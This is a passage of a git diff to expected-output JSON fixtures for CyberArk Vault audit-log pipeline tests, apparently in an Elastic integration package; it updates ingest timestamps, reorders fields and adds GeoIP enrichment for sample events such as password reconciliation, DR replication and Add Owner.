@@ -72,7 +72,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:54.412027600Z", + "ingested": "2021-12-14T14:42:21.213593850Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e31\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eWindows\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.4\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=dbserver.cyberark.local;username=Administrator2;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WIN-SERVER-LOCAL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"Administrator2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"dbserver.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" 
Value=\\\"DBServer\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessReconciliation\\\" Value=\\\"1604944215\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"EvilCorp\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Version\":\"11.6.0000\",\"MessageID\":\"31\",\"Desc\":\"CPM Reconcile Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Windows\",\"File\":\"Root\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\",\"Station\":\"10.2.0.4\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=dbserver.cyberark.local;username=Administrator2;\",\"Message\":\"CPM Reconcile Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WIN-SERVER-LOCAL\"},{\"Name\":\"UserName\",\"Value\":\"Administrator2\"},{\"Name\":\"Address\",\"Value\":\"dbserver.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating 
System\"},{\"Name\":\"LogonDomain\",\"Value\":\"DBServer\"},{\"Name\":\"SequenceID\",\"Value\":\"1\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessReconciliation\",\"Value\":\"1604944215\"},{\"Name\":\"Customer\",\"Value\":\"EvilCorp\"}]}}}}", "code": "31", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-310-monitor-dr-replication-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-310-monitor-dr-replication-start.log-expected.json index 085f60f49b2..5dd2d2578cd 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-310-monitor-dr-replication-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-310-monitor-dr-replication-start.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 2, "action": "monitor dr replication start", - "ingested": "2021-12-09T13:36:54.557699900Z", + "ingested": "2021-12-14T14:42:21.407663529Z", "original": "\u003c5\u003e1 2021-03-04T19:10:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:01\",\"IsoTimestamp\":\"2021-03-04T19:10:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"310\",\"Desc\":\"Monitor DR Replication start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor DR Replication start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor DR Replication start\",\"GatewayStation\":\"\"}}}", "code": "310", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -90,7 +90,7 @@ "event": { "severity": 2, "action": "monitor dr replication start", - "ingested": "2021-12-09T13:36:54.557707500Z", + "ingested": "2021-12-14T14:42:21.407667723Z", "original": "Mar 08 02:48:07 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"310\",\"Desc\":\"Monitor DR Replication start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor DR Replication start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor DR Replication start\",\"GatewayStation\":\"\"}}}", "code": "310", "kind": "event" 
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-311-monitor-dr-replication-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-311-monitor-dr-replication-end.log-expected.json index ace8cf5a812..ad4ef18a663 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-311-monitor-dr-replication-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-311-monitor-dr-replication-end.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 2, "action": "monitor dr replication end", - "ingested": "2021-12-09T13:36:54.731499500Z", + "ingested": "2021-12-14T14:42:21.621527931Z", "original": "\u003c5\u003e1 2021-03-04T19:10:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:01\",\"IsoTimestamp\":\"2021-03-04T19:10:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"311\",\"Desc\":\"Monitor DR Replication end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor DR Replication end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor DR Replication end\",\"GatewayStation\":\"\"}}}", "code": "311", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { 
@@ -90,7 +90,7 @@ "event": { "severity": 2, "action": "monitor dr replication end", - "ingested": "2021-12-09T13:36:54.731508200Z", + "ingested": "2021-12-14T14:42:21.621533614Z", "original": "Mar 08 02:48:07 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"311\",\"Desc\":\"Monitor DR Replication end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor DR Replication end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor DR Replication end\",\"GatewayStation\":\"\"}}}", "code": "311", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-316-reset-user-password-detailed-information.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-316-reset-user-password-detailed-information.log-expected.json index 69f60d165d0..66f499030b5 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-316-reset-user-password-detailed-information.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-316-reset-user-password-detailed-information.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -46,14 +39,30 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "reset user password detailed information", - "ingested": "2021-12-09T13:36:54.898654500Z", + "ingested": "2021-12-14T14:42:21.833092350Z", "original": "\u003c5\u003e1 2021-03-10T18:16:45Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:45\",\"IsoTimestamp\":\"2021-03-10T18:16:45Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"316\",\"Desc\":\"Reset User Password Detailed Information\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Reset User Password Detailed Information\",\"SourceUser\":\"PSMGw_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Password changed\",\"ExtraDetails\":\"\",\"Message\":\"Reset User Password Detailed Information\",\"GatewayStation\":\"\"}}}", "code": "316", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-317-reset-user-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-317-reset-user-password.log-expected.json index 684015175d5..501ae3de9f9 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-317-reset-user-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-317-reset-user-password.log-expected.json 
@@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -45,14 +38,30 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "reset user password", - "ingested": "2021-12-09T13:36:54.999436800Z", + "ingested": "2021-12-14T14:42:21.978940134Z", "original": "\u003c5\u003e1 2021-03-10T18:16:45Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:45\",\"IsoTimestamp\":\"2021-03-10T18:16:45Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"317\",\"Desc\":\"Reset User Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Reset User Password\",\"SourceUser\":\"PSMGw_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Reset User Password\",\"GatewayStation\":\"\"}}}", "code": "317", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-32-add-owner.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-32-add-owner.log-expected.json index ff8d5d395f0..f948fbcd3f6 100644 
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-32-add-owner.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-32-add-owner.log-expected.json @@ -7,6 +7,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -52,7 +61,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101419Z", + "ingested": "2021-12-14T14:42:22.112533986Z", "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Master\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -80,6 +89,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -124,7 +142,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101427Z", + "ingested": "2021-12-14T14:42:22.112536420Z", "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Administrator\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -152,6 +170,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -197,7 +224,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101432600Z", + "ingested": "2021-12-14T14:42:22.112536874Z", "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Batch\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", 
@@ -225,6 +252,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -270,7 +306,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101437900Z", + "ingested": "2021-12-14T14:42:22.112537260Z", "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Operators\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -298,6 +334,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -343,7 +388,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101443300Z", + "ingested": "2021-12-14T14:42:22.112537668Z", "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Backup Users\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -371,6 +416,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -416,7 +470,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101448700Z", + "ingested": "2021-12-14T14:42:22.112538066Z", "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Auditors\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", 
@@ -444,6 +498,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -489,7 +552,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101454Z", + "ingested": "2021-12-14T14:42:22.112538454Z", "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"DR Users\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -517,6 +580,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -562,7 +634,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101458100Z", + "ingested": "2021-12-14T14:42:22.112538842Z", "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Notification Engines\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -590,6 +662,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -635,7 +716,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101462400Z", + "ingested": "2021-12-14T14:42:22.112539226Z", "original": "\u003c5\u003e1 2021-03-10T09:11:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:22\",\"IsoTimestamp\":\"2021-03-10T09:11:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMPApp_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -663,6 +744,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -708,7 +798,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101467400Z", + "ingested": "2021-12-14T14:42:22.112539610Z", "original": "\u003c5\u003e1 2021-03-10T09:11:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:23\",\"IsoTimestamp\":\"2021-03-10T09:11:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -736,6 +826,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + 